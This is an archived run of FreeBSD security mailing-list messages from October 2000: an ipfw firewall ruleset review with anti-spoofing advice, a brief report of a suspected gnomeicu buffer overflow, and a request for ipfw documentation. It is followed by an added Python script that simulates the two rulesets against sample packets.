>>In the kernel I added these and recompiled:
>>
>>options IPSEC
>>options IPSEC_ESP
>
>Looks good to me.
>
>--------------------------------------------------------------------
>Mike Tancsa, tel +1 519 651 3400
>Network Administration, mike@sentex.net
>Sentex Communications www.sentex.net
>Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Fri Oct 27 12:57:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id C619037B479 for ; Fri, 27 Oct 2000 12:57:30 -0700 (PDT)
Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id e9RJvK456512 for ; Fri, 27 Oct 2000 12:57:21 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com)
To: security@freebsd.org
Subject: For those of you who were curious to know about Mark's day job...
Date: Fri, 27 Oct 2000 12:57:20 -0700
Message-ID: <56508.972676640@winston.osd.bsdi.com>
From: Jordan Hubbard
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

http://www.usatoday.com/life/cyber/tech/cti726.htm

:-)

From owner-freebsd-security Fri Oct 27 16:21:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id 342B637B479 for ; Fri, 27 Oct 2000 16:21:12 -0700 (PDT)
Received: from 98wkst ([10.10.1.71]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id TAA12038 for ; Fri, 27 Oct 2000 19:21:07 -0400
Reply-To:
From: "Peter Brezny"
To:
Subject: input on ipfw ruleset desired
Date: Fri, 27 Oct 2000 19:21:11 -0400
Message-ID: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello everyone,

If you have the time, please have a look at the ruleset below and let me know if I've missed something. I want to protect an internal network with this. If there is any tweaking that could be done to tighten it up or make it more efficient, I'd welcome the input.

Thanks for your comments.

Peter Brezny
SysAdmin Services Inc.
a.b.c.d = external ip
w.x.y.z/24 = private inside ip range
oif = outside interface
iif = inside interface

divert ip from any to any via oif
check-state
allow ip from a.b.c.d to any keep-state out xmit oif
allow ip from w.x.y.z/24 to any keep-state in recv iif
allow tcp from NS1 to a.b.c.d 53 keep-state
allow tcp from any to a.b.c.d 22,25,80,443 keep-state
deny log logamount 50 ip from any to any
deny ip from any to any

From owner-freebsd-security Fri Oct 27 17: 3:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailgw3.netvision.net.il (mailgw3.netvision.net.il [194.90.1.11]) by hub.freebsd.org (Postfix) with ESMTP id 873DF37B479 for ; Fri, 27 Oct 2000 17:03:16 -0700 (PDT)
Received: from alchemy.oven.org (ras1-p101.hfa.netvision.net.il [62.0.145.101]) by mailgw3.netvision.net.il (8.9.3/8.9.3) with ESMTP id CAA29205 for ; Sat, 28 Oct 2000 02:02:20 +0200 (IST)
Received: (from mapc@localhost) by alchemy.oven.org (8.11.0/8.11.0) id e9S03xF61660 for freebsd-security@freebsd.org; Sat, 28 Oct 2000 02:03:59 +0200 (IST) (envelope-from mapc)
Date: Sat, 28 Oct 2000 02:03:59 +0200
From: Roman Shterenzon
To: freebsd-security@freebsd.org
Subject: [roman@xpert.com: Remote buffer overflow in gnomeicu 0.93]
Message-ID: <20001028020359.A61199@alchemy.oven.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

----- Forwarded message from Roman Shterenzon -----

Date: Sat, 28 Oct 2000 00:46:08 +0200
From: Roman Shterenzon
To: nectar@freebsd.org, ports@freebsd.org, jwise@pathwaynet.com
Subject: Remote buffer overflow in gnomeicu 0.93
User-Agent: Mutt/1.2.5i

Hi,

Yesterday, running sockstat I noticed that openicu listens on TCP port 4000.
I was curious so I fed it with some zeroes from /dev/zero, and it crashed like a charm. I'm suspecting a buffer overflow which may allow an intruder to receive a shell on the victim's machine. Looking at the code suggests that the port can be chosen from the 4000-4100 range. I believe it needs to be checked and the port marked as FORBIDDEN meanwhile.

Sorry if it's a false alarm.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

----- End forwarded message -----

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Fri Oct 27 19:14:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 03B9237B4CF for ; Fri, 27 Oct 2000 19:14:20 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Fri, 27 Oct 2000 19:12:55 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9S2EE244330; Fri, 27 Oct 2000 19:14:14 -0700 (PDT) (envelope-from cjc)
Date: Fri, 27 Oct 2000 19:14:14 -0700
From: "Crist J. Clark"
To: Peter Brezny
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: input on ipfw ruleset desired
Message-ID: <20001027191414.C75251@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <000d01c0406c$98a88340$47010a0a@fire.sysadmininc.com>; from peter@sysadmin-inc.com on Fri, Oct 27, 2000 at 07:21:11PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Oct 27, 2000 at 07:21:11PM -0400, Peter Brezny wrote:
> Hello everyone,
>
> if you have the time, please have a look at the ruleset below and let me
> know if i've missed something. I want to protect an internal network with
> this. If there is any tweaking that could be done to tighten it up or make
> it more efficient, i'd welcome the input.
>
> Thanks for your comments.

Yes, I have more remarks.

First, I hope you left some things out. If not, you've broken your loopback. That is not a Good Thing.

Second, your gateway cannot talk directly to the internal machines, bug or feature (although it can respond to sessions they initiate)?

Also, you did not mention natd before. Rather than just let spoofs fall through the rules to the default deny, I like to kill them before they reach natd. They could potentially confuse the translation table and the very clever attacker could possibly get natd to modify the packets so they pass later rules.
> a.b.c.d = external ip
> w.x.y.z/24 = private inside ip range
> oif = outside interface
> iif = inside interface

# Let loopback work
pass all from any to any via lo0
# Stop loopback spoofs up front, shouldn't be needed, but does not hurt
deny log all from any to 127.0.0.0/8
# Stop spoofs from hitting the divert rule
# Note that this next rule might make noise in the logs when you hear
# your own broadcasts
deny log ip from a.b.c.d to any recv oif
deny log ip from w.x.y.z/24 to any recv oif

> divert ip from any to any via oif
> check-state
> allow ip from a.b.c.d to any keep-state out xmit oif
> allow ip from w.x.y.z/24 to any keep-state in recv iif
> allow tcp from NS1 to a.b.c.d 53 keep-state
> allow tcp from any to a.b.c.d 22,25,80,443 keep-state
> deny log logamount 50 ip from any to any
> deny ip from any to any

A final note, 50 is not going to be enough for any real-world network.

-- 
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Sat Oct 28 15:20:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from digitaldaemon.com (digitaldaemon.com [63.105.9.34]) by hub.freebsd.org (Postfix) with SMTP id A009D37B479 for ; Sat, 28 Oct 2000 15:20:40 -0700 (PDT)
Received: (qmail 27262 invoked from network); 28 Oct 2000 22:18:10 -0000
Received: from unknown (HELO smartsoft.cc) (192.168.0.73) by digitaldaemon.com with SMTP; 28 Oct 2000 22:18:10 -0000
Message-ID: <39FB50F6.10AF59D@smartsoft.cc>
Date: Sat, 28 Oct 2000 18:19:34 -0400
From: Jan Knepper
Organization: Smartsoft, LLC
X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: FreeBSD Security
Subject: ipfw reference
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I have set up a machine to host virtual domains, doing HTTP, SMTP and FTP for those domains. It also runs DNS.

I have configured ipfw, but wondered if anyone around here would know a very good ipfw reference with examples. I have read through the manual pages a couple of times and have something set up that works, but I am far from sure how effectively it protects the system, if it does at all.

Thanks!

Jan

-- 
Jan Knepper
Smartsoft, LLC
88 Petersburg Road
Petersburg, NJ 08270
U.S.A.
http://www.smartsoft.cc/
http://www.mp3.com/pianoprincess
Phone : 609-628-4260
FAX : 609-628-1267
FAX : 303-845-6415 http://www.fax4free.com/
Phone : 020-873-3837 http://www.xoip.nl/ (Dutch)
FAX : 020-873-3837 http://www.xoip.nl/ (Dutch)

In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe
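The ipfw exchange above (Peter Brezny's ruleset and Crist J. Clark's reply) turns entirely on rule order: whether anti-spoof rules sit in front of the divert rule, whether loopback survives, and whether the gateway can reach the inside. The following is an added example, not code from either message, that walks both rulesets first-match over a few constructed packets so the three points can be checked rather than argued. It binds the thread's placeholders to assumed values (a.b.c.d = 198.51.100.1, w.x.y.z/24 = 192.168.1.0/24, NS1 = 198.51.100.53, oif/iif = fxp0/fxp1), treats check-state and keep-state as no-ops because no dynamic state is modelled, and reports reaching the divert rule as the action "divert", the point at which an untranslated packet would be handed to natd.

```python
"""First-match walk over the two ipfw rulesets from the thread.

Added example, not from the original posts. Models rule order, interfaces,
addresses and ports only; keep-state/check-state and natd itself are not
modelled. All addresses and interface names below are assumptions.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# Placeholders from the thread bound to constructed values (assumed).
EXT_IP = "198.51.100.1"        # a.b.c.d
INSIDE = "192.168.1.0/24"      # w.x.y.z/24
NS1 = "198.51.100.53"          # secondary nameserver
OIF, IIF, LO0 = "fxp0", "fxp1", "lo0"


@dataclass
class Packet:
    src: str
    dst: str
    proto: str = "ip"
    dport: Optional[int] = None
    recv_if: Optional[str] = None   # interface it arrived on (None if locally generated)
    xmit_if: Optional[str] = None   # interface it leaves on (None during the inbound pass)


def rule(action, proto="ip", src="any", dst="any", dports=(),
         direction=None, recv=None, xmit=None, via=None):
    """One ipfw rule; 'any' means no constraint on that address."""
    return dict(action=action, proto=proto,
                src=None if src == "any" else ip_network(src, strict=False),
                dst=None if dst == "any" else ip_network(dst, strict=False),
                dports=set(dports), direction=direction,
                recv=recv, xmit=xmit, via=via)


def matches(r, p):
    """ipfw match semantics for the subset of options the thread uses."""
    if r["proto"] != "ip" and r["proto"] != p.proto:
        return False
    if r["src"] is not None and ip_address(p.src) not in r["src"]:
        return False
    if r["dst"] is not None and ip_address(p.dst) not in r["dst"]:
        return False
    if r["dports"] and p.dport not in r["dports"]:
        return False
    if r["direction"] == "in" and p.xmit_if is not None:
        return False
    if r["direction"] == "out" and p.xmit_if is None:
        return False
    if r["recv"] is not None and p.recv_if != r["recv"]:
        return False
    if r["xmit"] is not None and p.xmit_if != r["xmit"]:
        return False
    if r["via"] is not None and r["via"] not in (p.recv_if, p.xmit_if):
        return False
    return True


def first_match(ruleset, p):
    """ipfw stops at the first matching rule; the implicit last rule denies."""
    for number, r in enumerate(ruleset, 1):
        if matches(r, p):
            return number, r["action"]
    return len(ruleset) + 1, "deny"


# The ruleset as posted (check-state left out: no dynamic state is modelled).
POSTED = [
    rule("divert", via=OIF),
    rule("allow", src=EXT_IP, direction="out", xmit=OIF),
    rule("allow", src=INSIDE, direction="in", recv=IIF),
    rule("allow", "tcp", src=NS1, dst=EXT_IP, dports=(53,)),
    rule("allow", "tcp", dst=EXT_IP, dports=(22, 25, 80, 443)),
    rule("deny"),                      # deny log logamount 50 ip from any to any
    rule("deny"),                      # deny ip from any to any
]

# The rules the reply puts in front of the divert rule.
PREFIX = [
    rule("allow", via=LO0),            # let loopback work
    rule("deny", dst="127.0.0.0/8"),   # loopback spoofs
    rule("deny", src=EXT_IP, recv=OIF),   # our own address arriving from outside
    rule("deny", src=INSIDE, recv=OIF),   # inside range arriving from outside
]
HARDENED = PREFIX + POSTED

# Constructed packets, one per point raised in the reply.
SPOOFED_INSIDE_SRC = Packet("192.168.1.7", EXT_IP, "tcp", 80, recv_if=OIF)
LOOPBACK_SMTP = Packet("127.0.0.1", "127.0.0.1", "tcp", 25, recv_if=LO0)
GATEWAY_TO_INSIDE = Packet(EXT_IP, "192.168.1.5", "tcp", 22, xmit_if=IIF)
INBOUND_HTTP = Packet("203.0.113.5", EXT_IP, "tcp", 80, recv_if=OIF)


def verdicts(p):
    """Action each ruleset takes on p: {'posted': ..., 'hardened': ...}."""
    return {name: first_match(rs, p)[1]
            for name, rs in (("posted", POSTED), ("hardened", HARDENED))}


if __name__ == "__main__":
    for label, p in [("spoofed inside src", SPOOFED_INSIDE_SRC),
                     ("loopback smtp", LOOPBACK_SMTP),
                     ("gateway -> inside", GATEWAY_TO_INSIDE),
                     ("inbound http", INBOUND_HTTP)]:
        print(f"{label:20s} {verdicts(p)}")
```

Run as a script it prints one verdict per packet. The spoofed inside-range source reaches the divert rule (natd) in the posted set and is dropped by the fourth prefix rule in the hardened one; loopback SMTP falls to the catch-all deny in the posted set and is allowed by the hardened one; the gateway-to-inside packet is denied by both, which is the "bug or feature" question rather than something the prefix changes; ordinary inbound HTTP reaches the divert rule in both.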